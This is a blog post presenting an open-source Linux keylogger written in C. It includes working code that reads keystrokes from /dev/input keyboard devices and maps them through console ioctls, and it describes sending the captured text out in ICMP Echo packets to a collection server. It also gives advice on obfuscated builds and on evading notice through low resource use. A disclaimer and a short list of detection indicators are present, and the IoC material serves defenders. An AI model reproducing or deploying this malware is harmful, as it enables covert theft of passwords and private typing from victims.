making a keylogger for linux

Hello again. Today I’d like to share a project I’ve been working on, on and off, for a long time.

Every now and then I would pick this project up again, and I think it is now in a releasable state. First, let’s see a short demo, from yours truly.

As you can see, it is a userland keylogger, written in C. Let’s go over the key features, how they were implemented, and how they could be improved in the future.

mandatory disclaimer

In practice, this software will be detected. You won’t get any use from deploying it. This is just meant as a demonstration of how malware for Linux can be written, and to satisfy my personal curiosity. I have decided to open-source it so that others can learn from it too, but it would be extremely dumb of you to deploy it and use it against an oblivious victim (and also very illegal).

Please only use this to learn about Linux’s internals, like I have, and run it in a virtual machine or a Linux environment you own that is safe to infect.

I do not endorse the use of security tools for malicious purposes, nor do I wish to be responsible for your stupidity. thank u <3

the server

The server’s code is pretty boring. It receives ICMP packets and prints the content of the Data field whenever it receives an “Echo” request. This is where the data is exfiltrated to.

I’ve chosen Golang because I’ve used it for other projects in the past; it’s a solid and readable language with a very complete standard library.

If you want to implement your own server, you’re free to use whatever you want. It really doesn’t matter at all what you use, because it’s pretty much the most boring part of the project. My goal here is just to receive ICMP traffic, parse it and print it. You could just use tcpdump if you want.

the implant itself

Now, onto the most interesting part.

We have two modes, the debug and prod builds.

DEBUG mode

A debug mode is supported to allow for simpler development. To compile a debug binary, run make fclean && make debug in the mazepa-implant directory.

It gives me some debug logs (I just used syslog for this) and CLI input management, and it compiles with debug flags to help troubleshoot memory issues. You can easily use it with valgrind to find memory leaks or other issues in the implant:

sudo valgrind ./implant -i 192.168.122.1

Yes, you need root rights to run this. More on that later.

As opposed to the debug binary, we compile “production” binaries with flags optimized for obfuscation. Since the binary is also compiled statically, we can obviously strip it, and make it harder to reverse.

Finding and reading from keyboards

There are many techniques out there to read directly from the keyboard. First, you have to remember, everything on Linux is a file. So it’s just a matter of calling read on the correct file, so to say.

Keyboards usually live in /dev/input/by-path/*-kbd. You can just call open on this file after having resolved the correct path (it’s actually a symlink to a /dev/input/eventN device). This will give you every input event (source here) that the keyboard has received. From there it’s fairly trivial to just read the payload:

static void
handle_key_event(keymap_cache_t *cache, struct input_event *ev, ringbuf_t *rb, int *shift_held) {
    char ch;

    if (ev->type != EV_KEY)
        return;

    if (ev->code == KEY_LEFTSHIFT || ev->code == KEY_RIGHTSHIFT) {
        *shift_held = (ev->value != KEY_RELEASED);
        return;
    }

    if (ev->value != KEY_PRESSED)
        return;

    ch = keycode_to_char(cache, ev->code, *shift_held);
    if (ch != 0)
        ringbuf_push(rb, (uint8_t)ch);
}

uint8_t
evloop_run(implant_t *instance) {
    struct epoll_event events[MAX_EVENTS];
    struct input_event ev;
    keymap_cache_t keymap = {0};
    ringbuf_t ringbuf = {0};
    int nfds;
    int shift_held = 0; /* set while either SHIFT key is held down */

    // omitted for brevity ...


    for (int i = 0; i < nfds; i++) {
        ssize_t bytes = read(events[i].data.fd, &ev, sizeof(ev));
        if (bytes != sizeof(ev))
            continue;

        handle_key_event(&keymap, &ev, &ringbuf, &shift_held);

        // omitted for brevity ...
    }

}

As you can see, you can just read ev.code and ev.value to get an idea of what event happened (e.g. was a key pressed or released?).

Then, you keep this information in memory, because if SHIFT is pressed but not released, you have to take that into account when other keys are pressed! That is, of course, if you care about knowing whether the user typed a number or a symbol, or whether they wrote in caps or not.

Getting the current language

This approach has a few problems though, which most projects out there have not solved, from what I have seen. So, because I am very nice, I decided to share my technique for solving this problem. You’re welcome, dear reader.

What is the problem, you ask? Well, this approach of blindly reading from our keyboard file descriptor and assuming a fixed mapping only works if the user has a QWERTY keyboard. If they have (for example) a French keyboard with an AZERTY layout, the code-to-character mapping will be different and you will extract the wrong keys!

I initially tried to use libxkbcommon because it was mentioned here. It worked fairly well to read the same type of events and get the correct key mapping, but it had several drawbacks:

we need libxkbcommon installed on the victim machine, which is not guaranteed,
we can no longer build a static binary and strip function names, since the symbols from the dynamic library would no longer resolve.

To solve this, I have a really dumb solution: you make a keymap struct, open the console and ioctl your way into identifying the important keys:

typedef struct {
    char normal[KEYMAP_SIZE];
    char shifted[KEYMAP_SIZE];
} keymap_cache_t;

static int
open_console(void) {
    /* you can add others here, i just got lazy */
    const char *consoles[] = {"/dev/tty0", "/dev/console", "/dev/tty", NULL};

    for (int i = 0; consoles[i] != NULL; i++) {
        int fd = open(consoles[i], O_RDONLY | O_NOCTTY);
        if (fd >= 0) {
            return fd;
        }
    }
    return -1;
}

static void
cache_keymap(int console_fd, keymap_cache_t *cache) {
    struct kbentry entry = {0};

    memset(cache, 0, sizeof(*cache));

    /* let's make these a bit more readable. */
    cache->normal[KEY_ENTER] = '\n';
    cache->normal[KEY_KPENTER] = '\n';
    cache->normal[KEY_TAB] = '\t';
    cache->normal[KEY_SPACE] = ' ';
    cache->shifted[KEY_ENTER] = '\n';
    cache->shifted[KEY_KPENTER] = '\n';
    cache->shifted[KEY_TAB] = '\t';
    cache->shifted[KEY_SPACE] = ' ';

    for (int code = 0; code < KEYMAP_SIZE; code++) {
        if (cache->normal[code] != 0)
            continue;

        entry.kb_table = K_NORMTAB;
        entry.kb_index = (unsigned char)code;

        /* we get the correct code here. */
        if (ioctl(console_fd, KDGKBENT, &entry) == 0) {
            unsigned char type = KTYP(entry.kb_value);
            if (type == KT_LETTER || type == KT_LATIN) {
                cache->normal[code] = (char)KVAL(entry.kb_value);
            }
        }

        entry.kb_table = K_SHIFTTAB;
        entry.kb_index = (unsigned char)code;

        /* we do the same, but for the SHIFT table */
        if (ioctl(console_fd, KDGKBENT, &entry) == 0) {
            unsigned char type = KTYP(entry.kb_value);
            if (type == KT_LETTER || type == KT_LATIN)
                cache->shifted[code] = (char)KVAL(entry.kb_value);
        }
    }
}

Obviously, this makes for a LOT of ioctl calls, so we cache the result to avoid making so many calls all the time. This means that, currently, there is no way to refresh the keymap, but it has worked fairly well in my testing, as long as you use languages written in the Latin alphabet. I haven’t tested it with languages that use other writing systems, like Russian or Chinese.

ICMP exfil

We’ve talked about ICMP before on this blog. From my own experience, it is a protocol that is sometimes overlooked (especially over IPv6; moreover, there are a few differences between ICMP and ICMPv6 that you could use to your advantage), which is why I went with it. The exfiltration part is not that fascinating, honestly. We just put what we read into a ring buffer and periodically flush it. When it is flushed, we send an ICMP message to our server, storing our payload in the Data field of an Echo request.

You could use absolutely anything else for this part. HTTP or DNS are also very acceptable, and rarely detected on their own, if you mask the request well.
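To make the ring-buffer-and-flush idea a bit more concrete, here is a minimal sketch of a fixed-size byte ring buffer. It is not the project's actual implementation: the capacity, the field names and ringbuf_drain are assumptions made up for illustration, and only the ringbuf_t and ringbuf_push names come from the snippet earlier in this post.

```c
#include <stddef.h>
#include <stdint.h>

#define RB_CAPACITY 256 /* hypothetical size; must be a power of two */

typedef struct {
    uint8_t data[RB_CAPACITY];
    size_t head; /* total number of bytes ever pushed */
    size_t tail; /* total number of bytes ever drained or overwritten */
} ringbuf_t;

/* Append one byte; when the buffer is full, the oldest byte is overwritten. */
static void
ringbuf_push(ringbuf_t *rb, uint8_t byte) {
    rb->data[rb->head % RB_CAPACITY] = byte;
    rb->head++;
    if (rb->head - rb->tail > RB_CAPACITY)
        rb->tail = rb->head - RB_CAPACITY;
}

/* Copy up to `max` pending bytes into `out`, oldest first.
 * Returns the number of bytes copied. */
static size_t
ringbuf_drain(ringbuf_t *rb, uint8_t *out, size_t max) {
    size_t n = 0;

    while (rb->tail != rb->head && n < max) {
        out[n++] = rb->data[rb->tail % RB_CAPACITY];
        rb->tail++;
    }
    return n;
}
```

Everything lives in one fixed array, so there is no allocation at all, and whoever does the periodic flush only has to call ringbuf_drain once per interval and handle the whole batch in one go.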

Managing resources

Generally, when making implants, it’s best to avoid using too many resources. Heavy usage draws attention. An admin is more likely to connect and start snooping around on a machine with high CPU usage to understand what is causing it. So, one of the keys to not getting detected is to write efficient software. That being said, I am still in the process of cleaning things up lol.

In general, you should:

avoid making too many syscalls at once (e.g. don’t call write for EVERY key typed; try to delay and call write once with multiple characters. I know, shocker…)
avoid heap allocations where you can. Of course, the heap is very nice (and I do use it in the project) to get large amounts of memory, but the process of getting that memory is not free. If you can, just use the stack for what you need. It can work better than you think.
pay attention to your memory leaks! If you still decide to use malloc et al, make sure you actually free the memory / close the file descriptors in case of error, etc. Those issues add up, and will lead to your program crashing.
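For the last point, one common C idiom is to send every exit path through a single cleanup label. Below is a small, generic sketch of that pattern; read_first_chunk and CHUNK_SIZE are hypothetical names for illustration and are not taken from the project.

```c
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

#define CHUNK_SIZE 4096 /* hypothetical buffer size */

/* Read the first chunk of `path` and return the number of bytes read,
 * or -1 on error. Every exit path goes through the same cleanup code,
 * so neither the buffer nor the file descriptor can leak. */
static ssize_t
read_first_chunk(const char *path) {
    ssize_t result = -1;
    int fd = -1;
    char *buf = NULL;

    fd = open(path, O_RDONLY);
    if (fd < 0)
        goto cleanup;

    buf = malloc(CHUNK_SIZE);
    if (buf == NULL)
        goto cleanup;

    result = read(fd, buf, CHUNK_SIZE);

cleanup:
    free(buf); /* free(NULL) is a no-op */
    if (fd >= 0)
        close(fd);
    return result;
}
```

Initialising fd to -1 and buf to NULL up front is what makes the shared cleanup block safe, whichever step failed.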

Detection methods / IoCs

There are several ways to detect the usage of this implant in its current form:

some strings in the binary (/dev/tty0, /dev/input/by-path, …) indicate what this program is looking for,
the ICMP exfil is not encrypted, so you can just see the contents in plaintext,
the many ioctl calls at startup to get the keyboard layout are quite noisy,
any anti-virus worth its salt would be hooking read et al, and seeing what you are reading from.

There are other methods that I have in mind, but I am not going to give you everything! If you want to make it better, then get your hands dirty yourself ;)
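From the defender’s side, the plaintext ICMP indicator could be turned into a rough check like the one below. This is only a heuristic sketch under a couple of assumptions: the input is an ICMPv4 message with the IP header already removed, and ordinary ping traffic carries at least some non-printable bytes (timestamps, byte patterns) in its Data field. Some ping implementations pad with printable characters, so expect false positives. The function name is made up for this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>

#define ICMP_ECHO_REQUEST 8 /* ICMPv4 type for an Echo request (RFC 792) */
#define ICMP_HEADER_LEN 8   /* type, code, checksum, identifier, sequence */

/* Return 1 if `pkt` is an Echo request whose Data field is non-empty and
 * made up only of printable ASCII, newlines and tabs; return 0 otherwise. */
static int
echo_payload_looks_like_text(const uint8_t *pkt, size_t len) {
    if (len <= ICMP_HEADER_LEN || pkt[0] != ICMP_ECHO_REQUEST)
        return 0;

    for (size_t i = ICMP_HEADER_LEN; i < len; i++) {
        if (!isprint(pkt[i]) && pkt[i] != '\n' && pkt[i] != '\t')
            return 0;
    }
    return 1;
}
```

A match proves nothing on its own, but Echo requests that keep carrying readable text to the same destination are a good reason to take a closer look at the sending host.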

Conclusion

We’ve discussed several things, all of which can be improved. I might work on it, or not. Again, this is just something I did for my own curiosity. I am merely releasing it and writing about it to share the knowledge I’ve gained by working on it.

As always, making projects like these is very fun, and I look forward to making more.

You can check the source code at these addresses:

https://github.com/djnnvx/mazepa
https://evil.djnn.sh/mazepa/README.html

See you next time :)~